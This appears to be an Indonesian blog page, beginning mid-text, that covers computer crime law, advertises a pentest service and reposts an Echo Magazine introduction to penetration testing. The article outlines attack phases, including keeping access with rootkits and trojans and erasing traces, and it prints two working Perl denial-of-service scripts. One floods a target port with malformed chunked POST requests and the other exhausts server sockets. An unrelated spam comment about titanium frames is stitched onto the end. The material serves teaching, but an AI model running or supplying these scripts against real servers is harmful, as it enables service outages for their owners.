perangkat lunak, pencurian barang, jasa atau uang atau akses tidak sah ke
komputer medis tertentu. Denda berkisar $250.000 atau dua kali nilai data yang dicuri
dan pelanggar mendapat hukuman 1 sampai 5 tahun penjara. Contoh negara
lainnya adalah Kanada, salah satu pasal kejahatan komputer adalah
Criminal code 301.2(1) : “penggunaan
komputer secara tidak sah dikenakan
hukuman sampai 10 tahun untuk
penggelapan penggunaan komputer atau
intersepsi terhadap fungsi
komputer.” (George Bodnar, Accounting Information
System: 1995).
Ø PENETRATION TESTING
Penetration
testing atau sering disingkat menjadi
pentest merupakan istilah untuk pengujian terhadap kehandalan suatu sistem dan
mendokumentasikan tingkat keamanan aplikasi, sistem komputer, atau jaringan.
Jika ditemukan kelemahan suatu sistem maka dengan segera akan dilakukan
patch/penambalan sehingga keamanan sistem akan menjadi lebih kuat. Pentest
dilakukan sesuai konteks hukum yang legal, dengan kontrak antara
auditor/pentester dengan perusahaan yang ingin dilakukan pentest.
Target umum untuk penetrasi testing
meliputi:
·
Layanan yang menggunakan internet
(website, VPN endpoint, infrastruktur e-mail, extranet, dll)
·
Sistem internal atau servis yang ada
di jaringan (Active Directory, Exchange, dll)
·
Aplikasi tertentu (dibeli atau
dikembangkan sendiri oleh suatu perusahaan)
·
Jaringan internal
·
Karyawan perusahaan
TUJUAN TESTING
Tujuan dasar dari pentest adalah
untuk mengidentifikasi adanya kelemahan keamanan dalam aplikasi, komputer, atau
jaringan. Jika kelemahan dapat diidentifikasi dan dapat dibuktikan beserta
dengan analisis resikonya, maka anda akan memiliki kemampuan dan waktu untuk
memperbaikinya sebelum seseorang yang tidak berkepentingan mengambil keuntungan
dari kelemahan tersebut.
Layanan Pentest Ethic Ninja
Kami menyediakan jasa pentest dengan
2 metode yaitu sebagai berikut :
1.
Blackbox
Testing, yaitu melakukan penetrasi tanpa
mengetahui apapun mengenai sistem yang anda gunakan selain domain aplikasi
anda.
2.
Whitebox
Testing, yaitu melakukan penetrasi dengan
mengetahui informasi mengenai sistem dan logic yang anda gunakan, dimana kami
akan mempelajari logic dari pemrograman aplikasi anda (Code review) sehingga
menjadikan eksplorasi ditemukannya vulnerable/kelemahan lebih baik.
Kami membagi lagi ruang lingkup audit pentest sesuai
tingkatan yang perusahaan anda butuhkan :
Level 1: General Vulnerability
Scanning
Pada level ini kami mengumpulkan informasi
sebanyak-banyaknya, mengidentifikasi semua kelemahan yang mungkin didapat dan
mem-verifikasi kelemahan/vulnerability tersebut. Pada tingkatan ini kami akan
memberikan kelemahan-kelemahan penting yang ditemukan selama proses assesment
namun tidak sampai pada tahap penetrasi. Tingkatan ini cocok untuk customer
yang memiliki kebutuhan hanya untuk melakukan cek keamanan secara global dan
berulang/rutin.
Audit level 1 memiliki tahapan pengerjaan seperti berikut :
1.
Footprinting, mencari informasi
sebanyak mungkin tentang target
2.
Port scanning
3.
Identifikasi dan enumerasi service
4.
Vulnerability scanning
5.
Social engineering
6.
Laporan komprehensif mengenai detail
yang diperoleh dari tahapan-tahapan tersebut.
Level 2: Penetration Testing
Audit ini mencakup semua tahapan di
level 1 ditambah beberapa proses lagi. Dari hasil yang diperoleh dari audit
level 1, kami akan melakukan penetrasi guna membuktikan bahwa kelemahan
tersebut valid dan kami berikan PoC (Proof of Concept). Keuntungan dari audit
level 2 adalah customer akan mendapatkan informasi keamanan yang lebih rinci
dan realistis.
Audit level 2 memiliki cakupan
seperti berikut :
1.
Footprinting, mencari informasi
sebanyak mungkin tentang target
2.
Port scanning
3.
Identifikasi dan enumerasi service
4.
Vulnerability scanning
5.
Penetration Testing
o Vulnerability exploitation
o CVSS Scoring (kalkulasi tingkat resiko yang dihasilkan dari
kelemahan yang didapat)
6.
Social engineering
7.
Laporan komprehensif mengenai detail
yang diperoleh dari tahapan-tahapan tersebut
Level
3: Full Penetration Testing
Audit ini mencakup semua tahapan di
level 2 ditambah beberapa proses lagi pada bagian penetration testing. Dari
hasil yang diperoleh dari audit level 2, akan dilakukan proses eksploitasi
lebih lanjut. Keuntungan dari audit level 3 adalah audit ini dapat membantu
memvalidasi security policy perusahaan anda.
Audit level 2 memiliki cakupan
seperti berikut :
1.
Footprinting, mencari informasi
sebanyak mungkin tentang target
2.
Port scanning
3.
Identifikasi dan enumerasi service
4.
Vulnerability scanning
5.
Penetration Testing
o Vulnerability exploitation
o Brute forcing
o Password cracking
o Privilege escalation
o Gaining root
o CVSS Scoring
6.
Social engineering
7.
Laporan komprehensif mengenai detail
yang diperoleh dari tahapan-tahapan tersebut
Penetration
Testing Vectors
Varian vektor keamanan yang akan
diuji pada saat penetrasi adalah :
1.
SQLinjection
2.
XSS
3.
File Inclusion
4.
File upload
5.
Directory Traversal
6.
Access database found
7.
Access Admin Page found
8.
Apache exploit
9.
Application Error Message
10.
File Manager Script Exploit
11.
Code Execution
12.
Clickjacking
13.
CSRF Information Disclosure
14.
File Tampering
15.
Weak Password
16.
Host Header Attack
17.
Git Repository Found
18.
LDAP Injection
19.
PHPinfo Page Found
20.
Backup Data Found
21.
22.
.; .-.
23.
.-.
.-. ;;-. .-..-. `-' . ,';. .-.
24.
.;.-' ; ;;
;; ;' ;. ;'
;; ;;.;.-'
25.
`:::'`;;;;'.;`
``;;'( ;_.;:._.'; ;;
`:::'
26.
`-' ;
`.
27.
ECHO MAGAZINE VOLUME IX, ISSUE XXIV,
PHILE 0x0A.TXT
28.
29.
New Comer Series: Introduction to
Penetration Testing - _patusa.cyber_
30.
http://www.patusainside.wordpress.com
31.
32.
-----[ Penetration Testing
33.
34.
Sebelum terlalu jauh membahas
tentang penetration testing, alangkah
35.
baiknya kita terlebih dahulu
mengetahui tentang definisi dari
36.
penetration testing itu sendiri.
Merujuk dari penjelasan yang diberikan
37.
wikipedia, penetration testing
merupakan sebuah metode untuk
38.
meng-evakuasi keamanan sistem
komputer melalui simulasi pennyerangan
39.
terhadap target dengan menggunakan
malicious source (program jahat).
40.
Secara umum, proses penetration
system banyak disamakan oleh para
41.
junior system administrator dengan proses vulnerability system
42.
assessment.
43.
44.
Kesalahan mindset tersebut menjadi
suatu kesalahan fatal dalam
45.
pengelolaan keamanan sistem
komputer. Vulnerability system assessment
46.
merupakan sebuah prosedur scanning
terhadap vulnerabilities yang
47.
terdapat pada sistem dan melalukan
filtering terhadap kelemahan
48.
tersebut untuk menghindari aksi
eksploitasi oleh hacker. Hal ini jelas
49.
hampir mirip dengan pengertian
harfiah dari penetration testing yang
50.
mana proses pencarian terhadap
vulnerabilities (kelemahan) dan
51.
melakukan eksploitasi terhadap
sistem tersebut hingga tester mengetahui
52.
titik lemah sebenarnya dari sistem
tersebut.
53.
54.
Alasan umum tentang mengapa system
administrator WAJIB melakukan
55.
penetration testing terhadap
systemnya sendiri antara lain untuk
56.
menemukan titik kelemahan dan
vulnerabilities system sebelum titik
57.
kelemahan tersebut dieksploitasi
oleh hacker, memberikan gambaran bahwa
58.
manajemen terhadap system keamanan
komputer merupakan sebuah hal
59.
keharusan yang harus dilakukan,
menguji coba terhadap mekanisme
60.
firewal/alur keamanan sistem dan
meng-evaluasi apakah sistem yang
61.
digunakan sudah memenuhi standar
keamanan sistem komputer (walaupun
62.
sampai saat ini saya sendiri tidak
mengetahui tolak ukur sebenarnya apa
63.
yang dikatakan sistem yang aman),
melakukan tracing terhadap kesalahan
64.
internal (kesalahan penerapan
algoritma keamanan komputer/rule hak
65.
akses) dan bagaimana mempermudah
system administrator dalam mengelola
66.
management log jika terjadi insiden
penyerangan pada sistem (dalam hal
67.
ini erat kaitannya dengan digital
forensic).
68.
69.
Merujuk pada paper OSSTMM (December
13, 2006), dijabarkan mengenai
70.
teori pengimplementasian sistem
keamanan komputer yang dinilai cukup
71.
aman untuk meminimalisir tingkat
kecelahan keamanan terhadap server.
72.
Beberapa metode keamanan komputer
yang dapat implementasikan pada
73.
sistem antara lain :
74.
75.
Internet Gateway and Service
76.
77.
- Jangan pernah menggunakan remote
akses yang tidak terenkripsi
78.
- Jangan pernah menggunakan remote
akses yang tidak terautentifikasi
79.
- Lakukan pembatasan akses yang
diperboleh baik itu diijinkan ataupun
80.
ditolak secara spesifik
81.
- Lakukan monitoring secara berkala
dan lakukan pencatatan log
82.
- Desentralisasi
83.
- Batasi antara koneksi sistem yang
tidak terpercaya
84.
- Lakukan proses
"penyeleksian" terhadap inputan yang diterima server
85.
dan lakukan validasi terlebih dahulu
86.
- Lakukan installasi program yang
sesuai dengan kebutuhan
87.
- Selalu usahakan server berada pada
status "invisible" User
88.
- Desentralisasi autorisasi
89.
- Hak akses terhadap sistem hanya
dapat dilakukan pada jaringan
90.
internal
91.
- Membatasi informasi yang diberikan
kepada user mengenai teknologi
92.
infrastruktur dan Informasi Server
93.
94.
Secara umum, tidak adan aturan baku
yang benar-benar mengatur tentang
95.
proses penetrasi terhadap server.
Tingkat keberhasilan proses penetrasi
96.
terhadap server sendiri ditentukan
dari tingkat kekreativitasan tester
97.
untuk berpikir mencari jalan terbaik
dan terefektif untuk memperoleh
98.
hasil seakurat mungkin terhadap
kelemahan server. merujuk pada
99.
refferensi "Professional
Penetration Testing", dikemukakan beberapa
100.tahapan yang "umum" dilakukan oleh tester untuk
mencari kelemahan dari
101.server
102.
103.1. Information Gathering
104. Information
Gathering difokuskan untuk dapat mengumpulkan informasi
105. secukupnya mengenai
sistem target. proses pengumpulan informasi
106. sendiri terbagi
menjadi dua, yaitu passive information gathering dan
107. active information
gathering. pengumpulan informasi menggunakan
108. teknik passive
information gathering dapat menggunakan service
109. WHOIS, DNS, Search
Engine (Google), Website Analisis Security
110. (netcraft) dan
tools seperti Maltego, metagofil dan tracerout.
111. Sedangkan untuk
prosedur active information gathering biasanya
112. hacker menggunakan
teknik Port Scanning, Banner Grab,
113. Fingerprinting,
Network Mapping dan ARP Poisoning
114.
115.2. Vulnerability Scanning
116. Langkah ini
merupakan lanjutan dari proses Information Gathering,
117. tujuan melakukan
proses ini untuk mengidentifikasi kelemahan yang
118. kemungkinan dapat
dimanfaatkan untuk proses eksploitasi.
119. Vulnerability
Scanning dapat menggunakan Database-database
120. vulnerabilites
website seperti: CVE Database, SecurityFocus, Milis
121. Bugtraq, Inesecure,
cve.mitre.org, xforce.iss.net,
122.
packetstormsecurity.org, kb.cert.org/vuls.
123.
124. Selain menggunakan
database vulnerabilites website, penggunaan tools
125. dalam hal
vulnerability Scanning juga dapat dilakukan dengan
126. menggunakan software
seperti: Nessus, Qualys, Fuzzing (Vunelrability
127. Scanning Web
Based), Nikto (Vunelrability Scanning Web Based), dan
128. WebInspect
(Vunelrability Scanning Web Based).
129.
130.3. Penetration Testing
131. Tahapan ini
merupakan tahapan yang paling ditunggu-tunggu oleh para
132. hacker, tujuan dari
tahapan ini adalah eksploitasi terhadap
133. kelemahan system
(vulnerabilities system) yang sudah didapatkan pada
134. tahapan sebelumnya.
tahapan dalam penetration testing antara lain
135. gaining
access,Escalate Privilage, Maintain Access, Clean Up.
136.
137. Proses gaining
access (penetrasi) dapat menggunakan beberapa cara,
138. antara lain dengan
penggunaan Metasploit. Untuk proses Escalate
139. Privilege merupakan
sebuah proses untuk peningkatan hak akses yang
140. sudah didapatkan
oleh hacker. teknik yang biasanya dilakukan antara
141. lain crack admin/crack password, brute-force dan
rainbow tables.
142.
143. Langkah selanjutnya
yang harus dilakukan apabila sudah mendapatkan
144. hak akses adalah
dengan menjaga hak akses tersebut agar kita tetap
145. bisa masuk ke dalam
sistem tanpa bersusah payah seperti di awal
146. (Maintain Access),
salah satu metode yang sering digunakan antara
147. lain rootkits dan
trojans. langkah terakhir yang harus dilakukan
148. oleh hacker setelah
mendapatkan seluruh informasi yang dia butuhkan
149. adalah dengan
menghilangkan semua jejak yang tertinggal dalam
150. sistem.
151.
152. Salah satu item
penetration testing yang dapat digunakan untuk
153. menguji tentang ketahanan
dan kekuatan server dapat menggunakan
154. teknik DoS, DoS
merupakan sebuah proses yang difokuskan untuk
155. menghabiskan
resource yang terdapat pada sistem target. varian
156. terbaru dari serang
DoS adalah DDoS, DDoS adalah sebuah serangan
157. flodding yang
menggunakan puluhan hingga ribuan zombie (victim
158. komputer yang sudah
diinfeksi terlebih dahulu) yang bertujuan untuk
159. menghabiskan
resource dari sebuah server.
160.
161. Serangan DoS
sendiri terbagi menjadi beberapa jenis
antara lain
162. yang cukup terkenal
adalah Smurf, Fraggle, SYN Flood,
Teardrop dan
163. Ping Of Death.
berikut ini saya lampirkan beberapa script DoS yang
164. saya gunakan untuk
melakukan penetration test terhadap server lokal
165. yang pernah saya
gunakan (Shoutz and Tribute to MOBY dan Y3DIPS).
166. saya hanya
menyesuaikan dengan kondisi jaringan yang saya gunakan.
167. Bagi yang ingin
menggunakannya harap teliti untuk mengganti beberapa
168. settingan di dalam
script tersebut ServiceAttack.pl (sebuah script
169. Dos yang langsung
melakukan serangan kepada service port 81)
170.
171.--------------------- ServiceAttack.pl
-----------------
172. #!/usr/bin/perl -w
173.
174. use IO::Socket;
175.
176. printf"\n***********************************************************************\n";
177.
178. print " * Script perl disini digunakan untuk
melakukan serangan D.O.S *\n";
179. print
" * thanks to modified, tested and
credit for y3dips, new inspiration *\n";
180. print
" * based on <Luis Wong> lwong
[at]mpsnet.net.mx *\n";
181. print
" * greetz to echostaff a.k.a the_day, moby,
comex, all crew *\n";
182. printf"
***********************************************************************\n\n";
183.
184. if(@ARGV == 1){
185. my $host = $ARGV[0];
186. my $i;
187. while(){
188. $sock
= IO::Socket::INET->new(PeerAddr => $host,
189. PeerPort => "81",
190. Proto => 'tcp');
191. unless($sock){
192. die
" kalo masih ngak bisa, check
portnya atau ditolak ama si target server!.";
193. }
194. $sock->autoflush(1);
195. print
$sock "POST /eCHo.htm HTTP/1.1\nHost: $host\nTransfer-Encoding:
196. chunked\n\n90000000\n\n";
197. while
( <$sock> ){
198. print;
199. }
200.
201. close
$sock;
202. $i++;
203. print
".";
204. }
205. }else{
206.
207. print " [GUnakan] ... ./$0 'HosT'
<< untuk linux \n" ;
208. print " [Gunakan] ... perl $0 'Host' <<untuk windows \n";
209. }
210.-------------------- ServiceAttack.pl --------------------
211.
212. gantungscoket.pl
(Script ini bertujuan untuk menyerang langsung socket dari server)
213.
214.-------------------- gantungsocket.pl
--------------------
215. #!/usr/bin/perl
216.
217. use IO::Socket;
218.
219. if (!$ARGV[1]) {
220.
221. print
"Cara Menggunakanna: perl gantungsocket.pl [host] [port] \n";
222. exit;
223.
224. }
225. for (1..1300) {
226. $fh{$_}=new
IO::Socket::INET
227. PeerAddr=>
"$ARGV[0]",
228. PeerPort=>
"$ARGV[1]",
229. Proto
=> "tcp"
230. or die; print
"$_\n"
231.
232. }
233. # Thx to MOBY for
your based code
234.-------------------- gantungsocket.pl ---------------------
235.
236.
237.4. Analisis terhadap
proses pentest
238. Setelah
mendapatkan hasil yang cukup memuaskan, salah satu tugas
239. terpenting dari
seorang tester adalah melakukan analisis terhadap
240. permasalahan dan
vulnerabities yang sudah berhasil di eksploitasi
241. sehingga menemukan
sebuah solusi/jalan keluar untuk menangani
242. permasalahan
tersebut.
243.
244.5. Documentation
245. Proses ini
merupakan langkah terakhir dari proses Pentest. Intisari
246. dari dokumentasi
penetration testing ialah untuk mengklasifikasikan
247. vulnerabilities
tersebut berada pada posisi mana apakah tergolong
248. beresiko tinggi,
beresiko menengah, ataupun tidak beresiko sama
249. sekali
250.
251.
252.-----[ Link Bermanfaat
253.
254.Untuk melakukan simulasi tentang proses penetrasi alangkah
baiknya
255.junior administrator dapat bermain-main terlebih dahulu
dengan beberapa
256.tools dibawah ini, antara lain
257.
258. 1. Backtrack
259. 2. Nmap
(http://www.insecure.org/nmap/)
260. 3. Nessus
(http://www.nessus.org/)
261. 4. Metasploit
(http://metasploit.org/)
262. 5. WebScarab
263. 6. Wireshark
264. 7. Immunity Canvas
(http://www.immunitysec.com/index.shtml)
265. 8. IP Scanner
(http://www.topshareware.com/IPScanner-download-11457.htm)
266. 9. ISS Internet
Scanner (http://www.iss.net)
267. 10. CSS Cisco
Security Scanner (http://www.cisco.com)
268. 11. N-Stealth
Scanner (http://www.nstalker.com/eng/products/nstealth)
269. 12. SuperScan 4.0
(http://www.scanwith.com/download/SuperScan.htm)
270.
271.setelah cukup familiar dengan beberapa tools tersebut tidak
ada
272.salahnya untuk mencoba melakukannya dalam sebuah simulasi,
perlengkapan
273.yang mungkin dibutuhkan antara lain De-ICE Pentest Disc,
Metasploit
274.Unleashed, WebGoat, HackThisSite, Hax.tor.hu,
275.
276.Selain beberapa refferensi yang sudah saya berikan diatas,
informasi
277.tentang tools untuk melakukan penetrasi juga dapat ditemukan
pada site
278.dibawah ini,
279.
280.1. http://www.frozentech.com/content/livecd.php
281. Live CD bootable
linux dengan tools yang dilengkapi dengan tools untuk
282. penetration testing
283.
284.2. http://www.remote-exploit.org
285. Situs yang menjadi
"kandang" hacking, salah satu produk terkenal yang
286. disediakan remote
exploit adalah backtrack
287.
288.3. http://examples.oreilly.com/networksa/tools/ situs ini
289. berisi kira-kira
100 buah tools yang digunakan untuk penetration
290. testing
291.
292.Beberapa website yang menyediakan database tentang
vulnerabilities
293.system antara lain :
294.1. Milworm (http://www.milw0rm.com) *down
295.2. Metasploit (http://www.metasploit.com)
296.3. Security Focus (http://www.securityfocus.com)
297.4. Packet Storm Security
(http://www.packetstormsecurity.org)
298.
299.-----[ Referensi
300.
301.[x] Thomas, Wilhelm. Professional Penetration Testing.
Rockland:
302. Syngress
Publishing Inc, 2010
303.[x] http://www.bitsecglobalforensics.com/netdefense.co.uk
304.[x] Paper OSSTMM 2.2.
(Open-Source Security Testing Methodology Manual)
305.
306.-----[ Shoutz
307.Allah SWT Beserta Nabi Muhammad SAW
308.MOBY - thanks atas script DOS nya yang masih bisa digunakan
(Salam
309. Sanak
Sakampuang) :D
310.Y3DIPS
311.EchoStaff||
312._Cheppy_
Sumber:
3D-Titanium Bmx Frame - TITanium-Arts
BalasHapus3D-Titanium titanium wood stove Bmx Frame is a grade 23 titanium new piece titanium jewelry piercing of custom frame concept for the titanium trim hair cutter Sega Genesis. This ridge titanium wallet new piece of custom frame concept allows you to customise your